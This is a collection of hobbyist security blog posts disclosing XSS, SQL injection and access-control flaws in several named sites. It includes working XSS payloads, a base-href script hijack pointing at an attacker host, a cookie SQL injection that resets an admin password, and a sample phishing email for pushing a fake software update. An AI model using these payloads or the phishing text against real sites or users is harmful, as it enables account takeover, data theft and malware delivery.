After reading “Thousand Ways to SQL Injection“, people started to ask me whether it is possible to launch a SQL injection using XSS? Some of them questioned me about the possiblity of it, some of them don’t even believe it’s possible. And well some of them say that’s gonna happen but don’t know how or never came accross one.

Let’s take a look at the following ‘fictive’ (and lame) scenario of SQL Injection using XSS :

As we know that site abc.com uses GoodGoodCMS_v1.0 as their Content Management System. Mr. Z, the attacker, found out that GoodGoodCMS has a XSS flaw on the admin page. But well there is nothing much to exploit since GoodGoodCMS doesn’t uses Cookies as the authentication method. But Mr. Z did found out that the GoodGoodCMS uses Cookies values in SQL Query without a proper filter.

Guess what? Mr. Z pull a XSS and insert something like this:

<script>document.cookies=”1; UPDATE admin_table SET password=\’yihaa\’ WHERE id=1″;</script>

This is my concept of SQL Injection using XSS. Correct me if I am wrong, and you are very welcome to shout your ideas about this topic here.

Thanks

Zoiz – http://zoiz.web.id

This morning I received an interesting email from webappsec.org mailing list. Amit Klein founds out that he can trigger a XSS without a <script> tag NOR inside ONE. Here is the PoC :

<html>
…
***XSS code may be embedded here***
…
<script src=”/foo/bar.js”></script>
…
</html>

The XSS is something like this :

<base href=”http://www.attacker.com/”>

And the attacker should put some JS on his host on the exact directory (ex : http://www.attacker.com/foo/bar.js). You know what happens next rite?

The coolest part of this XSS is it doesn’t even need a <script> tag or something like that. And for developers that uses / trusts blacklist approach (oranglist, greenlist, pinklist, or what ever you name it) that is usually targeting for “script”, this kind of attacks will surely bypass it.

Nice one Amit Klein

So, what is the solution? Myself suggest you not to allow your users to use HTML

We noticed you arrived on Bla3.com searching for “GOD Sighting”
You might find additional content on those search terms at this site search link

The page echo your search strings. What if :

inurl:thevulnsite.com intext:<script>alert(/xss/);</script>

How to use? CSRF is the answer. Remember that XSS & CSRF are pal

Thanks,

Zoiz
http://zoiz.web.id

php Line 1146 : $referrer = (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ”);

This might pull a XSS out of your admin page if a malicious user spoof the a referer URL into something like this : http://bla3.com/’>”><script>alert(/XSS/)</script>

You might either update your Statpress or fixed it yourself by sanitizing the $referrer.

http://wordpress.org/extend/plugins/statpress/

Credits flies to : Rogério Vicente & Daniele Lippi

Here is the Proof of Concept :

http://bbs.cn.yahoo.com/searchApplyBoard/PHNjcmlwdD5hbGVydCgiWFNTLWJ5cGFzcy1Oby1TY3JpcHQiKTwvc2NyaXB0Pg==.html

Result :

XSS on Yahoo over No-Script plugin. It’s a triple kill! I know Yahoo! is in the No-Script white-list, but I thought No-Script was supposed to block this XSS anyway. What do you think?

Register.net.id is a .id domain registrar of Indonesia. It provided Indonesia webmasters domains at affordable prices (But I got this domain for FREE – promotion period only!! ). Since it’s a domain registrar site, so it can be considered as a very important site in Indonesia. It serves webmasters in Indonesia for their .id domains need with approximately more than 40.000 active domains, which is a huge number.

One of the term to apply a .id domain is that user must upload his/her personal information thingie like Personal Identity Card, NPWP, SIUP, SITU, etc. Depend on what kind of TLD he/she wanted. For example, to request a .web.id domain, an user must upload his/her Personal Identity Card (KTP). And so are other kinds of TLD. Since Register.net.id holds and stores many important documents from their users, it system’s security became ultimately important. Thus my bugs hunt project began

Those bugs below are being keep by me for some time. I’ve never publish it for public. Since I’ve reported those bugs to Register.net.id Admin and most of are are fixed, now I am able to publish what I’ve found

1. Whois XSS

The XSS vulnerability on the Whois engine first time found by me on 14 July 2007. You can read this post about how I found it, and this post that I rewrite. It’s not a big vulnerability though, but due to it’s mass, so it’s worth mentioning

Status : Fixed, Date : unknown

2. Personal Documents Leakage

By modifying the document id, I am able to list all the documents that is stored on the database easily. The documents included Personal Identification Card (KTP), NPWP, SIUP, SITU, etc. This is a serious problem though. And also a malicious user can perform an illegal request without a proper privilege to view other users personal information. If you do not know how much your personal information worth, you must read this : http://www.bankrate.com/brm/news/pf/20060221b1.asp.

My friend, Th0R has also published a white-paper about this personal document leakage issue too on his blog.

Status : Fixed, Date : 10 April 2008

3. Illegal Documents Deletion

A malicious user can delete a document or even mass deletion of documents due to lack of privilege authentication.

Status : Fixed, Date : 10 April 2008

4. Illegal Personal Information Listing

A malicious user can list out a victim contact information, such as address, phone number, etc.

Status : Fixed, Date : 10 April 2008

5. Domain Deletion

A malicious user can DELETES ANY DOMAIN NAME that he wanted without a proper privilege. This is the BIGGEST problem I think

Status : Fixed, Date : 10 April 2008

6. Logic Flaw

And there is also a logic flaw that will let a malicious user to get what they want easier. Like a malicious user can search for any domain he wanted to delete by first finding the date of the domain is register, and then calculate the domain id from the registration date provided on whois service. But with those bugs above fixed, this logic flaw seems to be useless now

Status : Fixed, Date : 10 April 2008

I have reported those bugs to Adit (The webmaster that change my profile before ) for FREE of course, hehe. There are some more bugs that I can’t publish because it have not been fixed yet. From the information I got from Adit, he told me that they are developing the new version of Register.net.id web application. He said, my skill in Webappsec is needed when they launch it That’s cool, and I can’t wait to see it! Hehe

Since most of the critical vulnerabilities I’ve found are fixed, Register.net.id is safer to use now and more secure than before

You can register your own .id domain without risking your personal information now! Sayonara~

Shouts to : Th0R, Arie, YS, Adit, Fl3xu5, Calvin

Bugs Found By :

Zoiz – Http://zoiz.web.id
Nothing is Secure~

ZoneAlarm is one of the most secure brands in End User Internet Security software. It’s developed by Check Point Software Technology Company. It protects over 60 million PCs from viruses, spy-wares, hackers and identity thefts. The award-winning Internet Security product line is installed in end users PCs and small businesses, protecting them from Internet threats.

Although Check Point Company provides Internet Security service, but their web system is not 100% secure at all. I have found some critical vulnerabilities even on their own official site!!

Although they are Internet Security Software developer, that protects million of PCs from viruses, hackers, and identity thefts. But they cannot even protect their own website from web application attacks. It’s already proofed today. There are some critical XSS and CSRF vulnerability found by YS.

Let me start it:

Yesterday, I visited one of an internet café to check my emails. Each computer was installed with ZoneAlarm Software. Suddenly, a small window prompt out and reminded me to update my ZoneAlarm software.

I followed the instruction and was updated the ZoneAlarm software by clicking the update button. I was brought to their update page. Suddenly, a “bad idea” came into my mind.. Hehe

“This is a internet security website, does this security website is really secure from web application attack such as XSS and CSRF?”, I asked myself.

After that, I tried to use javascript to test whether the website has an XSS vulnerability… Ding !! BIngo, ZoneAlarm XSSed!

XSS is stored on Session

XSS vulnerability on the shopping cart page:

Display Cookie using XSS

This XSS Vulnerability can be considered as critical. Because this XSS is triggered when a user trying to update ZoneAlarm software. An attacker can easiliy smuggler a trojan or a virus into the download link, and let the user download a trojan instead of ZoneAlarm Update File.

This can be done easily by combining Social Engineering and trick the victims to open a page containing the XSS. For example an attacker can forge a fake email and send it to ZoneAlarm users, and trick them to update their software through the link the attacker provided.

Dear ZoneAlarm Users,

Firstly we are very sorry to inform you that our automatic update system is currently ongoing some technical problem which will be fixed as soon as possible. By the time we are fixing the system, you are unable to update your ZoneAlarm system directly from your PC. But fortunately we you can do it by visiting the update link below to update your ZoneAlarm.

ZoneAlarm Update

We are sorry for all the inconvenience we’ve made. And thank your for your support to our product all the time. Bla3……

Other possibility is the attacker create a redirection link to trick user to download the ZoneAlarm software that has been infected by malicious program through the XSS vulnerable. After the user downloaded it, and install into his/her PC, the big trouble will be occurred such as sensitive information from the user may be stolen, damages the PC, and other problems.

Interesting XSS on the Shopping Cart Section

Based on my research, I found out the XSS is being stored on session too!! So that means the XSS vulnerability may let an attacker injects the malicious script on more pages and takes more advantages too.

I have actually reported this to the associated party, and hope that this can be fixed asap due to it’s criticality.

Bingo!!! This article has told us, “Nothing is Secure”. (Always stated by Zoiz )

——————————————————————

Notice:

I want to tell everyone first that “I’m not sure, whether those XSS vulnerability has found before or not. From my survey, I didn’t see those xss vulnerable was posted on other site until now. I have checked at XSSed.com. those XSS vulnerable that i found it’s not found at the XSSed.com too. But some other xss vulnerable on ZoneAlarm.com has been found by other people and posted at XSSed.com and it’s said Fixed already too, and it’s different to mine. Remember this article for educational purpose only.

——————————————————————

Bug Found By : YS – http://www.insecurityexposed.net
Status : Reported on 3rd April 2007, Unfixed.

For those who doesn’t know how to change user agent information :

To change the User Agent string, just enter about:config as an address in the address bar of FireFox,  Now press the right mouse button to get the context menu and select “String” from the menu entry “New”. Enter the preference name “general.useragent.override”, without the quotes. Next, enter the new User Agent value you want Mozilla Firefox to use. (You can also use a FireFox plugin to do this)

This is where the XSS (Cross Site Scripting) play the role. You might enter this :

<script>alert(/XSS/);</script>

And visit the page you wanted to test, and see what happen

Here is an example vulnerable site for you : http://www.quirksmode.org/js/detect.html

<img src=”http://zoiz.web.id/fotoku.jpg” width=”10″ height=”10″ onerror=”window.location.href=’http:/zoiz.web.id’;”>

The method is the same as my Pop Up Method, it triggered javascript inside image error handler hence it bypasses javascript filter. This apply to sites that allow users to post image on their comments.

By : Zoiz [at] http://zoiz.web.id
Nothing is Secure

Here is the review :

“This little tool scans a page for common XSS / HTML injection vulnerabilities.
Please note: This tool is intended to scan your site for potential HTML-injection. If I see bulk-requests, your IP may be banned.” This is how Jaimie Sirovich said, so use this tool and obey the rules. I’ve tried this XSS / HTML Injection Scanner on a random site, and indeed this XSS / HTML Injection scanner founds a XSS vulnerability on that site. Don’t believe me? Just try it yourself here :

http://www.seoegghead.com

Thanks

Zoiz